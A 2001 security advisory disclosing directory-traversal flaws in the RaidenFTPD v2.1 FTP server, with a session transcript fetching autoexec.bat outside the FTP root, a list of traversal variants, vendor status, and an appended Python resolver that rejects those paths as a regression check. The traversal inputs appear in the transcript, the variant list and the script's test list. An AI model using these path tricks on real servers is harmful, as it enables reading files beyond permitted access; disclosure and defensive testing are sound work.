From: joetestaHUSHMAIL.COM
Date: Wed Apr 25 2001 - 20:13:06 CDT


    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in RaidenFTPD Server


    RaidenFTPD v2.1 is an ftp server available from
    http://playstation2.idv.tw/raidenftpd. Vulnerabilities exist which allow
    users to break out of the ftp root.


    The following is an illustration of the problem:

    > ftp localhost
    220-This FTP site is running free version of RaidenFTPD
    220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-
    220-Download english version from http://playstation2.idv.tw/raidenftpd/
    220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
    220-This server is for private use only
    220-If you do not have access to this server
    220-Please disconnect now
    220 Please enter your login name now.
    User (xxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog .
      [really long login banner edited out]
    230 User jdog logged in , proceed.
    ftp> get ....\....\autoexec.bat
    200 Port command ok.
    150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
    226-++s+u_z U : 419 _+_+ W : 0 _+_+
    226-+Ut+O : 419 kb/sec _z Unlimited kb U+B+
    226-+e++O /
    226 Transfer finished successfully. Data connection closed.
    ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
    ftp> cd ....
    250-++-U+ 1323 mb
    250 "/.." is current directory.

    This excerpt was taken from a session involving build #947. The vendor
    has released four builds since I initially contacted them to address
    additional variations. The following is a list of vulnerabilities which
    affected these intermediate versions:

    CWD \....
    CWD *\.....
    CWD /..../
    NLST ..
    NLST ...
    NLST \..\
    NLST \...\


    Upgrade to build #952 at:

        Vendor Status

    Team JohnLong was contacted via <jlkplaystation2.idv.tw> on
    Friday, April 20, 2001. They quickly responded and worked diligently
    on the problems until all issues were fixed.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron


    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools
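
The traversal arguments quoted in the advisory can be turned into a regression check for an FTP server's path handling. The following is an added example, not part of the original message and not RaidenFTPD's code: a resolver that works only on the virtual namespace and refuses parent references above the FTP root, dot-only or dot-trailing components, and wildcards. The names `resolve`, `audit` and `PathRejected` are hypothetical, and the policy assumes a server that maps a virtual root "/" onto a Windows directory.

```python
import re

class PathRejected(ValueError):
    """Raised when a client-supplied FTP path must not be resolved."""

SEPARATORS = re.compile(r"[\\/]+")   # a Windows host accepts both separators
WILDCARDS = set("*?")

def resolve(cwd, arg):
    """Return the normalised virtual path for `arg`, relative to virtual `cwd`.

    Works purely on the virtual namespace: the result always starts at the
    FTP root "/", and anything the host OS might reinterpret is refused.
    """
    absolute = arg[:1] in ("/", "\\")
    stack = [] if absolute else [p for p in cwd.split("/") if p]
    for part in SEPARATORS.split(arg):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathRejected("parent of FTP root: %r" % arg)
            stack.pop()
        elif part.strip(". ") == "" or part[-1] in ". ":
            # "...", "....", "name." and similar: not ordinary names to the host
            raise PathRejected("dot-only or dot-trailing component: %r" % arg)
        elif WILDCARDS & set(part):
            raise PathRejected("wildcard in path component: %r" % arg)
        else:
            stack.append(part)
    return "/" + "/".join(stack)

# Constructed input: the arguments quoted in the advisory, issued from the root.
ADVISORY_ARGS = [r"....\....\autoexec.bat", "....", r"\....", r"*\.....",
                 "/..../", "..", "...", "\\..\\", "\\...\\"]

def audit(cwd="/"):
    """Map each advisory argument to the resolved path or the rejection reason."""
    results = {}
    for arg in ADVISORY_ARGS:
        try:
            results[arg] = resolve(cwd, arg)
        except PathRejected as exc:
            results[arg] = "REJECTED: " + str(exc)
    return results

if __name__ == "__main__":
    for arg, outcome in audit().items():
        print("%-26r %s" % (arg, outcome))
```

The resolved virtual path should be joined to the real root only after this check passes, and the same function should serve every command that takes a path (CWD, NLST, RETR and the rest) so that no command has its own parser.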
